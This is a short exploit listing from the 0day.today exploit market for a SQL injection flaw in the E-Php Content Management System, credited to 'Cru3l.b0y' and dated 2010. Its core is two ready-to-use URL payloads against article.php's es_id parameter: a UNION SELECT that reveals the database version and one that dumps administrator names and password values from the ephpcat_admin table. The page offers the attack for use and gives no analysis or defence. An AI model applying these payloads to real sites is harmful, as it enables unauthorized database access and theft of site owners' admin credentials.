[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

E-Php Content Management System SQL Injection Vulnerability

Author
Cru3l.b0y
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14739
Category
web applications
Date add
05-11-2010
Platform
php
===========================================================
E-Php Content Management System SQL Injection Vulnerability
===========================================================

In The Name Of GOD
[+] Exploit Title: E-Php Content Management System SQL Injection Vulnerability
[+] Date: 2010-11-03
[+] Author  : Cru3l.b0y
[+] Software Link: http://www.ephpscripts.com/content-management-system.php
[+] Tested on: Ubuntu 10.10
[+] Contact : Cru3l.b0y@gmail.com
[+] Website : WwW.PenTesters.IR
[+] Greeting: Behzad, Ahmad, ...
 
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[+] Exploit :
 
                http://target/path/cms/article.php?es_id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12
                http://target/path/cms/article.php?es_id=-1+union+select+1,group_concat(es_admin_name,0x3a,es_pwd),3,4,5,6,7,8,9,10,11,12+from+ephpcat_admin



#  0day.today [2024-12-26]  #